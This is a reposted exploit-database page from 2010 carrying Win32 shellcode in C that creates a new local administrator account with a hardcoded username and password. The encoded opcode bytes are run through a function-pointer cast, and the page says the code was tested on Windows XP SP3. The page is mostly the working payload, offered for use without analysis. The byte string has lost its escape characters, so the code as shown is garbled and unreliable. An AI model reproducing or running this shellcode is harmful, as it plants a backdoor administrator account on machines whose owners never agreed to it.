Home / os / win7

[win32] - win32 generic - add new local administrator 326 by

Posted on 04 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>win32 generic - add new local administrator 326 bytes | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='win32 generic - add new local administrator 326 bytes by Anastasios Monach in win32 | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=====================================================
win32 generic - add new local administrator 326 bytes
=====================================================

/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
 
char code[] =
&quot;xdaxdexd9x74x24xf4xb8x22xd2x27x7ax29xc9xb1x4b&quot;
&quot;x5bx31x43x1ax83xebxfcx03x43x16xe2xd7x3bxbcx7a&quot;
&quot;x17xbcx95x4bxd7xd8x92xecxe7xa5x65x94x08x2dx25&quot;
&quot;x69x9dx41xbaxdcx2axe1xcaxf7x25xe2xcax07xbexa2&quot;
&quot;xfex8ax80x5ex74xd4x3cxc1x49xb5xb7x91x69x12x4c&quot;
&quot;x2cx4exd1x06xaaxd6xe4x4cx3fx6cxffx1bx1ax51xfe&quot;
&quot;xf0x78xa5x49x8dx4bx4dx48x7fx82xaex7axbfx19xfc&quot;
&quot;xf9xffx96xfaxc0x30x5bx04x04x25x90x3dxf6x9dx71&quot;
&quot;x37xe7x56xdbx93xe6x83xbax50xe4x18xc8x3dxe9x9f&quot;
&quot;x25x4ax15x14xb8xa5x9fx6ex9fx29xc1xadx72x01x53&quot;
&quot;xd9x27x5dxacxe6xb1xa5xd2xdcxcaxa9xd4xdcx4bx6e&quot;
&quot;xd0xdcx4bx71xe0x12x3ex97xd1x42xd8x57xd6x92x43&quot;
&quot;xa9x5cx9cx0dx8ex83xd3x70xc2x4cx13x73x1bxc4xf6&quot;
&quot;x9bx43x29x07xa4xfdx17x1cxb9xa0x1ax9fx3axd4xd4&quot;
&quot;xdex82xeex16xe0x04x07xa0x1fxfbx28x26xd1x5fxe6&quot;
&quot;x79xbdx0cxf7x2fx39x82xc7x80xbexb1xcfxc8xadxc5&quot;
&quot;x2fxf7x4ex57xb4x26xf5xdfx51x17xdax7cxbax39x41&quot;
&quot;xf7x9axb0xfax92xa8x1ax8fx39x2ex2ex06xa6x80xf0&quot;
&quot;xb5x16x8fx9bx65x78x2ex38x01xa6x96xe6xe9xc8xb3&quot;
&quot;x92xc9x78x53x38x68xedxccxccx05x98x62x11xb8x06&quot;
&quot;xeex38x54xaex83xcexdax51x10x40x68xe1xf8xedxe9&quot;
&quot;x66x8cx78x95x58x4ex54x34xfdxeaxaa&quot;;
 
int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf(&quot;New local admin 	Username: secuid0
			Password: m0nk&quot;);
    return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-04]</pre></body></html>

 

TOP